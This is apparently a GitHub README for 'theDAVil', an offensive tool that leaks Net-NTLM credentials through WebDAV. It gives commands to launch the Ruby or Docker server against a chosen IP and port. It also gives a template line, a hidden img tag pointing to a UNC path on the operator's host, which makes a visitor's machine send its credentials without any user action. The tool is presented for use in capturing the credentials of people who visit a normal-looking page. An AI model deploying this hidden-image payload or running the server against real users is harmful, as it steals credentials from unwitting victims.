Skip to content

audibleblink/davil

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

theDAVil

Host a website with an image at a UNC path and get creds. Bypasses Intranet Zones and forces auth over the Internet.

note: discovered later that this only work on virtualized hosts that use hypervisor-defined-networking that will resolve intergerized IP addresses via DNS, to a normal IP. Having such a hypervisor bypasses the Intranet Zones restriction of automatic authentication, bypassing any need for user interaction.

A normal looking web page

Behind the Scenes

Usage

With Docker

./theDAVil.sh 192.168.99.101 443`

With Just Ruby

# If you already have a ruby dev env
bundle
ruby server.rb 192.168.99.101 443


# Else
apt install rbenv ruby-build
rbenv install 3.0.0
eval $(rbenv init -)

bundle install
bundle exec ruby server.rb 192.168.99.101 443

Customization

Replace the views/index.erb with your content. Make sure you keep the template line that looks like this:

<img src="<%= "\\\\#{@host}@#{@port}\\logo.png" %>" style="display: none" />

About

leaking net-ntlm with webdav

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages